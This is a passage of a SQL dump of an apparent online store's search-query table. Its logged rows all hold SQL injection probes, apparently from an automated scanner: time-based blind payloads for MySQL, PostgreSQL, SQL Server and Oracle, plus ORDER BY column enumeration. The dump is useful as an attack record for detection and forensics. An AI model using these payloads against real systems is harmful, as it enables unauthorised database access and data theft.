(7564, 'dSiI AND (SELECT 5022 FROM (SELECT(SLEEP(5)))YrlE)# JLMW', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:17'),
(7566, 'dSiI\' AND SLEEP(5)-- PDgf', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:20'),
(7568, 'dSiI\') AND SLEEP(5) AND (\'jAFk\' LIKE \'jAFk', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:25'),
(7570, 'dSiI\')) AND SLEEP(5) AND ((\'YsrW\' LIKE \'YsrW', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:27'),
(7572, 'dSiI%\' AND SLEEP(5) AND \'opXk%\'=\'opXk', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:30'),
(7574, 'dSiI\' AND SLEEP(5) AND \'QChy\' LIKE \'QChy', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:34'),
(7576, 'dSiI\") AND SLEEP(5) AND (\"xHWz\" LIKE \"xHWz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:38'),
(7578, 'dSiI\" AND SLEEP(5) AND \"PXGx\" LIKE \"PXGx', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:40'),
(7580, 'dSiI\' AND SLEEP(5) OR \'dtbD\'=\'Nggp', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:42'),
(7582, 'dSiI) AND SLEEP(5)-- ygFS', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:46'),
(7584, 'dSiI AND SLEEP(5)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:50'),
(7586, 'dSiI AND SLEEP(5)-- Dxrz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:53'),
(7588, 'dSiI AND SLEEP(5)# xqfh', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:55'),
(7590, 'dSiI\' AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:57'),
(7592, 'dSiI\') AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:09:59'),
(7594, 'dSiI\')) AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:01'),
(7596, 'dSiI\'))) AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:03'),
(7598, 'dSiI%\' AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:05'),
(7600, 'dSiI\") AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:07'),
(7602, 'dSiI\")) AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:09'),
(7604, 'dSiI\" AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:12'),
(7606, 'dSiI) AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:16'),
(7608, 'dSiI)) AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:18'),
(7610, 'dSiI))) AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:21'),
(7612, 'dSiI AND SLEEP(5)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:24'),
(7614, 'dSiI\' AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:26'),
(7616, 'dSiI\') AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:29'),
(7618, 'dSiI\')) AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:31'),
(7620, 'dSiI\'))) AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:33'),
(7622, 'dSiI%\' AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:36'),
(7624, 'dSiI\") AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:38'),
(7626, 'dSiI\")) AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:40'),
(7628, 'dSiI\" AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:42'),
(7630, 'dSiI) AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:44');
INSERT INTO `search_query` (`query_id`, `query_text`, `num_results`, `popularity`, `redirect`, `store_id`, `display_in_terms`, `is_active`, `is_processed`, `updated_at`) VALUES
(7632, 'dSiI)) AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:47'),
(7634, 'dSiI))) AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:49'),
(7636, 'dSiI AND (SELECT 7657 FROM (SELECT(SLEEP(5)))JEhH)#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:53'),
(7638, 'dSiI\' RLIKE SLEEP(5)-- cxeV', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:10:55'),
(7640, 'dSiI\') RLIKE SLEEP(5) AND (\'kTQu\' LIKE \'kTQu', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:02'),
(7642, 'dSiI\')) RLIKE SLEEP(5) AND ((\'FqmV\' LIKE \'FqmV', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:04'),
(7644, 'dSiI%\' RLIKE SLEEP(5) AND \'WfxT%\'=\'WfxT', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:06'),
(7646, 'dSiI\' RLIKE SLEEP(5) AND \'TrCf\' LIKE \'TrCf', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:08'),
(7648, 'dSiI\") RLIKE SLEEP(5) AND (\"RwqC\" LIKE \"RwqC', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:13'),
(7650, 'dSiI\" RLIKE SLEEP(5) AND \"vzel\" LIKE \"vzel', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:15'),
(7652, 'dSiI\' RLIKE SLEEP(5) OR \'gDbu\'=\'xEeP', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:17'),
(7654, 'dSiI) RLIKE SLEEP(5)-- ftXq', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:20'),
(7656, 'dSiI RLIKE SLEEP(5)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:27'),
(7658, 'dSiI RLIKE SLEEP(5)-- HOAN', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:31'),
(7660, 'dSiI RLIKE SLEEP(5)# goOj', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:34'),
(7662, 'dSiI\' RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz)-- fDDa', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:36'),
(7664, 'dSiI\') RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz) AND (\'crAe\' LIKE \'crAe', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:44'),
(7666, 'dSiI\')) RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz) AND ((\'duMb\' LIKE \'duMb', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:46'),
(7668, 'dSiI%\' RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz) AND \'RIYn%\'=\'RIYn', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:48'),
(7670, 'dSiI\' RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz) AND \'mwZs\' LIKE \'mwZs', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:51'),
(7672, 'dSiI\") RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz) AND (\"uThI\" LIKE \"uThI', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:11:58'),
(7674, 'dSiI\" RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz) AND \"gBcK\" LIKE \"gBcK', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:01'),
(7676, 'dSiI\' RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz) OR \'BEHc\'=\'yGNL', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:03'),
(7678, 'dSiI) RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz)-- MYZF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:05'),
(7680, 'dSiI RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:10'),
(7682, 'dSiI RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz)-- DFwV', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:13'),
(7684, 'dSiI RLIKE (SELECT 6333 FROM (SELECT(SLEEP(5)))hSCz)# QGTB', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:15'),
(7686, 'dSiI\' AND 1026=(SELECT 1026 FROM PG_SLEEP(5))-- Xlou', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:38'),
(7688, 'dSiI\') AND 1026=(SELECT 1026 FROM PG_SLEEP(5)) AND (\'Ymrn\' LIKE \'Ymrn', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:43'),
(7690, 'dSiI\')) AND 1026=(SELECT 1026 FROM PG_SLEEP(5)) AND ((\'PGBe\' LIKE \'PGBe', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:45'),
(7692, 'dSiI%\' AND 1026=(SELECT 1026 FROM PG_SLEEP(5)) AND \'Tzgl%\'=\'Tzgl', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:48'),
(7694, 'dSiI\' AND 1026=(SELECT 1026 FROM PG_SLEEP(5)) AND \'zecU\' LIKE \'zecU', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:52'),
(7696, 'dSiI\") AND 1026=(SELECT 1026 FROM PG_SLEEP(5)) AND (\"TSHk\" LIKE \"TSHk', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:57'),
(7698, 'dSiI\" AND 1026=(SELECT 1026 FROM PG_SLEEP(5)) AND \"wlGb\" LIKE \"wlGb', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:12:59'),
(7700, 'dSiI\' AND 1026=(SELECT 1026 FROM PG_SLEEP(5)) OR \'aLWp\'=\'klHl', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:01'),
(7702, 'dSiI) AND 1026=(SELECT 1026 FROM PG_SLEEP(5))-- lAcm', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:03'),
(7704, 'dSiI AND 1026=(SELECT 1026 FROM PG_SLEEP(5))', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:08'),
(7706, 'dSiI AND 1026=(SELECT 1026 FROM PG_SLEEP(5))-- lACj', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:11'),
(7708, 'dSiI AND 1026=(SELECT 1026 FROM PG_SLEEP(5))# Lruu', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:14'),
(7710, 'dSiI\' WAITFOR DELAY \'0:0:5\'-- gLjG', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:16'),
(7712, 'dSiI\') WAITFOR DELAY \'0:0:5\' AND (\'HGkV\' LIKE \'HGkV', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:22'),
(7714, 'dSiI\')) WAITFOR DELAY \'0:0:5\' AND ((\'dimK\' LIKE \'dimK', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:24'),
(7716, 'dSiI%\' WAITFOR DELAY \'0:0:5\' AND \'YmYM%\'=\'YmYM', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:26'),
(7718, 'dSiI\' WAITFOR DELAY \'0:0:5\' AND \'yQfR\' LIKE \'yQfR', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:28'),
(7720, 'dSiI\") WAITFOR DELAY \'0:0:5\' AND (\"iAjR\" LIKE \"iAjR', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:34'),
(7722, 'dSiI\" WAITFOR DELAY \'0:0:5\' AND \"rIoJ\" LIKE \"rIoJ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:37'),
(7724, 'dSiI\' WAITFOR DELAY \'0:0:5\' OR \'rmFg\'=\'fjvP', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:39'),
(7726, 'dSiI) WAITFOR DELAY \'0:0:5\'-- qAax', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:41'),
(7728, 'dSiI WAITFOR DELAY \'0:0:5\'', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:47'),
(7730, 'dSiI WAITFOR DELAY \'0:0:5\'-- lZcm', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:49'),
(7732, 'dSiI WAITFOR DELAY \'0:0:5\'# fHYp', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:51'),
(7734, 'dSiI\' AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5)-- XYXX', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:53'),
(7736, 'dSiI\') AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5) AND (\'tvHh\' LIKE \'tvHh', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:13:59'),
(7738, 'dSiI\')) AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5) AND ((\'Vopx\' LIKE \'Vopx', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:02'),
(7740, 'dSiI%\' AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5) AND \'Olas%\'=\'Olas', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:04'),
(7742, 'dSiI\' AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5) AND \'oMwj\' LIKE \'oMwj', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:06'),
(7744, 'dSiI\") AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5) AND (\"YBjN\" LIKE \"YBjN', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:12'),
(7746, 'dSiI\" AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5) AND \"aJRT\" LIKE \"aJRT', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:14'),
(7748, 'dSiI\' AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5) OR \'COCl\'=\'TLue', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:16'),
(7750, 'dSiI) AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5)-- goWH', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:18'),
(7752, 'dSiI AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:23'),
(7754, 'dSiI AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5)-- qcuF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:26'),
(7756, 'dSiI AND 3258=DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(78)||CHR(80)||CHR(111),5)# uzoS', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:29'),
(7758, '(SELECT 9318 FROM (SELECT(SLEEP(5)))PHAm)', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:33'),
(7760, '(SELECT 4317 FROM PG_SLEEP(5))', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:35'),
(7762, 'dSiI\' ORDER BY 1-- oAAu', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:49'),
(7764, 'dSiI\' ORDER BY 6038-- oVHJ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:54'),
(7766, 'dSiI\') ORDER BY 1-- XzRN', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:14:57'),
(7768, 'dSiI\') ORDER BY 9255-- AHtD', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:00'),
(7770, 'dSiI\')) ORDER BY 1-- hxZg', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:02'),
(7772, 'dSiI\')) ORDER BY 6877-- GnKl', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:05'),
(7774, 'dSiI\'))) ORDER BY 1-- Thmk', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:13'),
(7776, 'dSiI\'))) ORDER BY 4399-- lqpn', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:16'),
(7778, 'dSiI\' ORDER BY 1-- HDix', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:19'),
(7780, 'dSiI\' ORDER BY 8477-- rHOe', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:25'),
(7782, 'dSiI\') ORDER BY 1-- LNxE', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:27'),
(7784, 'dSiI\') ORDER BY 7634-- hlpS', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:29'),
(7786, 'dSiI\')) ORDER BY 1-- FeeG', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:31'),
(7788, 'dSiI\')) ORDER BY 9254-- nmHz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:33'),
(7790, 'dSiI%\' ORDER BY 1-- eJxD', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:36'),
(7792, 'dSiI%\' ORDER BY 4048-- LzRw', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:39'),
(7794, 'dSiI\' ORDER BY 1-- CtLV', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:41'),
(7796, 'dSiI\' ORDER BY 4720-- xxoz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:43'),
(7798, 'dSiI\") ORDER BY 1-- IIjI', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:46'),
(7800, 'dSiI\") ORDER BY 5788-- Gyai', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:50'),
(7802, 'dSiI\")) ORDER BY 1-- ClJO', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:52'),
(7804, 'dSiI\")) ORDER BY 1951-- PGsp', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:55'),
(7806, 'dSiI\" ORDER BY 1-- oyVF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:15:57'),
(7808, 'dSiI\" ORDER BY 6332-- piUi', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:01'),
(7810, 'dSiI\") ORDER BY 1-- GrKm', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:03'),
(7812, 'dSiI\") ORDER BY 5918-- kKDz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:08'),
(7814, 'dSiI\" ORDER BY 1-- srda', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:10'),
(7816, 'dSiI\" ORDER BY 3570-- KfiZ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:12'),
(7818, 'dSiI\' ORDER BY 1-- uNQk', 0, 2, NULL, 1, 1, 1, 0, '2025-11-06 16:16:45'),
(7822, 'dSiI\' ORDER BY 3873-- fQhh', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:47'),
(7824, 'dSiI) ORDER BY 1-- dSzf', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:49'),
(7826, 'dSiI) ORDER BY 8156-- yvKW', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:51'),
(7828, 'dSiI) ORDER BY 1-- UipM', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:53'),
(7830, 'dSiI) ORDER BY 3638-- RKgN', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:55'),
(7832, 'dSiI)) ORDER BY 1-- sLkg', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:16:57'),
(7834, 'dSiI)) ORDER BY 1723-- UxGo', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:01'),
(7836, 'dSiI))) ORDER BY 1-- ZQAg', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:04'),
(7838, 'dSiI))) ORDER BY 4019-- GhpF', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:06'),
(7840, 'dSiI ORDER BY 1-- VLZA', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:09'),
(7842, 'dSiI ORDER BY 5519-- bWpg', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:11'),
(7844, 'dSiI ORDER BY 1-- sAzB', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:14'),
(7846, 'dSiI ORDER BY 4874-- JlFw', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:16'),
(7848, 'dSiI ORDER BY 1-- BClw', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:18'),
(7850, 'dSiI ORDER BY 9278-- TAri', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:20'),
(7852, '-1436\' ORDER BY 1-- jEPb', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:23'),
(7854, '-4309\' ORDER BY 9911-- gOtD', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:26'),
(7856, '-7338\') ORDER BY 1-- DeIP', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:28'),
(7858, '-6312\') ORDER BY 9880-- Tcmz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:30'),
(7860, '-6312\')) ORDER BY 1-- qWYX', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:32'),
(7862, '-1990\')) ORDER BY 2855-- ZzQC', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:36'),
(7864, '-4205\'))) ORDER BY 1-- rGeY', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:38'),
(7866, '-8615\'))) ORDER BY 6949-- Mrrp', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:40'),
(7868, '-1440\' ORDER BY 1-- CPss', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:42'),
(7870, '-3633\' ORDER BY 4343-- qAVQ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:44'),
(7872, '-7093\') ORDER BY 1-- PEXM', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:48'),
(7874, '-8948\') ORDER BY 8359-- JJkC', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:51'),
(7876, '-3402\')) ORDER BY 1-- vdgk', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:53'),
(7878, '-7052\')) ORDER BY 5835-- gFmJ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:55'),
(7880, '-8465%\' ORDER BY 1-- qowt', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:57'),
(7882, '-5361%\' ORDER BY 4888-- QqLH', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:17:59'),
(7884, '-2657\' ORDER BY 1-- uJWt', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:01'),
(7886, '-8049\' ORDER BY 8239-- oTSm', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:03'),
(7888, '-8518\") ORDER BY 1-- OIgm', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:06'),
(7890, '-9305\") ORDER BY 1380-- ogXd', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:08'),
(7892, '-3319\")) ORDER BY 1-- uztI', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:10'),
(7894, '-9736\")) ORDER BY 2071-- mptV', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:12'),
(7896, '-9576\" ORDER BY 1-- hrfA', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:14'),
(7898, '-1389\" ORDER BY 9308-- aHaO', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:16'),
(7900, '-9982\") ORDER BY 1-- omry', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:18'),
(7902, '-2429\") ORDER BY 4433-- VZXe', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:20'),
(7904, '-4684\" ORDER BY 1-- qwwJ', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:22'),
(7906, '-1487\" ORDER BY 3985-- xSMw', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:24'),
(7908, '-5896\' ORDER BY 1-- BUyU', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:26'),
(7910, '-4316\' ORDER BY 8257-- ROKY', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:28'),
(7912, '-1244) ORDER BY 1-- ygHb', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:30'),
(7914, '-2830) ORDER BY 2199-- UREc', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:32'),
(7916, '-1899) ORDER BY 1-- BKAR', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:35'),
(7918, '-6932) ORDER BY 1989-- wUPm', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:37'),
(7920, '-2179)) ORDER BY 1-- KDMT', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:39'),
(7922, '-6541)) ORDER BY 7167-- sLNb', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:42'),
(7924, '-5256))) ORDER BY 1-- FNyr', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:44'),
(7926, '-7039))) ORDER BY 2653-- cDKz', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:46'),
(7928, '-4208 ORDER BY 1-- zKXa', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:48'),
(7930, '-2788 ORDER BY 1689-- FSXU', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:50'),
(7932, '-4092 ORDER BY 1-- sAzh', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:52'),
(7934, '-8494 ORDER BY 2508-- yDPC', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:54'),
(7936, '-5866 ORDER BY 1-- DjpE', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:18:58'),
(7938, '-2292 ORDER BY 3350-- FzFs', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:00'),
(7940, 'dSiI\' ORDER BY 1#', 0, 4, NULL, 1, 1, 1, 0, '2025-11-06 16:20:06'),
(7942, 'dSiI\' ORDER BY 8076#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:05'),
(7944, 'dSiI\') ORDER BY 1#', 0, 2, NULL, 1, 1, 1, 0, '2025-11-06 16:19:23'),
(7946, 'dSiI\') ORDER BY 9068#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:09'),
(7948, 'dSiI\')) ORDER BY 1#', 0, 2, NULL, 1, 1, 1, 0, '2025-11-06 16:19:28'),
(7950, 'dSiI\')) ORDER BY 5353#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:13'),
(7952, 'dSiI\'))) ORDER BY 1#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:15'),
(7954, 'dSiI\'))) ORDER BY 2933#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:17'),
(7958, 'dSiI\' ORDER BY 3595#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:21'),
(7962, 'dSiI\') ORDER BY 9685#', 0, 1, NULL, 1, 1, 1, 0, '2025-11-06 16:19:26'),
